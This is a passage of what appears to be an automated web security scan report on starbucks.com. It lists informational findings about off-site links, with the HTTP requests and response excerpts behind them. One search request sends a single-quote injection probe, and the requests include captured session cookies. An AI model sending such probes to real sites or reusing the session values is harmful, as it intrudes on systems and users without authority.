<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

5.3. http://www.starbucks.com/menu/catalog/nutrition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /menu/catalog/nutrition?food=bakery HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:58 GMT
Connection: close
Content-Length: 50149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/menu/catalog/nutrition?food=bakery" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

5.4. http://www.starbucks.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?keywords=%27 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:03:21 GMT
Content-Length: 33802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords='" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

5.5. http://www.starbucks.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?keywords= HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:41 GMT
Connection: close
Content-Length: 33559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords=" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
